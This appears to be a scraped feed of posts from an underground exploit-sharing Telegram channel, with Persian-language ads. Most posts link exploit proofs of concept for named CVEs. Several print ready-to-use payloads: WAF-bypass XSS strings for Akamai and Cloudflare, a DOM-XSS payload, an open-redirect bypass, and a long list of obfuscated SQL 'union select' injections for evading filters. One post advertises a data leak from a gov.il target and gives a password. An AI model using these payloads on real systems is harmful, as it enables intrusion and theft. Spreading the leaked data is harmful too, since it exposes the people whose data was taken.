تبلیغات داخل کانال زیرزمینی Learnexploit ⚡️

تعرفه تبلیغات

ترکیدم به سرعت ⚡️

iliyahr

#mood
@Learnexploit

A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)

Github

#RCE #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army

A kernel exploit for Pixel7/8 Pro with Android 14

Github

#Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army

Bypass open redirection whitelisted using chinese dots:

%E3%80%82

Tip: Keep eyes on SSO redirects

#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

Defcon Media Server - This is an "index of /" with files from the Defcon Archive.

Link

#onion #Darkweb
——————
0Day.Today
@LearnExploit
@Tech_Army

Akamai WAF bypass XSS

<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol 
          contenteditable
          onbeforeinput='location=b.value+c.value+d.value'>
click and write here!

#WAF #Bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Bypass SQL union select

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

#Bypass #SQL
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

bypass XSS Cloudflare WAF

Encoded Payload:

"><track/onerror='confirm\%601\%60'>

Clean Payload:

"><track/onerror='confirm`1`'>

HTML entity & URL encoding:

" --> &#34;
> --> &gt;
< --> &lt;
' --> &#x27;
` --> \%60

#Bypass #XSS #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army

bbscope

Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!

Need to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job.
What about getting a list of android apps that you are allowed to test? We've got you covered as well.

Reverse engineering god? No worries, you can get a list of binaries to analyze too :)

Installation:
Make sure you've a recent version of the Go compiler installed on your system. Then just run:

GO111MODULE=on go install github.com/sw33tLie/bbscope@latest

Usage:

bbscope (h1|bc|it|ywh|immunefi) -t <YOUR_TOKEN> <other-flags>

Github

⬇️ Download
🔓 LearnExploit

#GO #Grabber #Scope #BugBounty
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

Scan for [CVE-2023-49785] ChatGPT-Next-Web - SSRF/XSS

⬇️ Download
🔓 BugCod3

#BugBounty #Nuclei #Templates
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

Payload Wizard

Link

#Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army

CVE-2024-20767 Adobe ColdFusion


#Cve #Exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army

Target: gov.il

Password: @h4shur


#data #leak

@h4shur

CVE-2024-21413: Microsoft Outlook Leak Hash

CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC

#CVE #POC
——————‌
0Day.Today
@LearnExploit
@Tech_Army

جریان فیلترینگ اخیر و همچنین نحوه ی عملکرد فرگمنت در این فیلترینگ ؟

دو سوالی هست که کمتر کسی به صورت کامل در رابطه با آنها صحبت کرده اند.

در پست بعدی به طور کامل باهاش آشنا میشیم.

➖➖➖➖➖➖➖➖➖➖➖
🔸IR0Day.Today Group
🔹@BypassNetWork

تلگرام پریمیوم یک ساله
به صورت گیفت
قیمت ۹۹۵ تومن
جهت تهیه پیام بدید :
@IRDefacer

XSS of the day : DOM-XSS-SiteMinder

Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

Nuclei tamplete

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army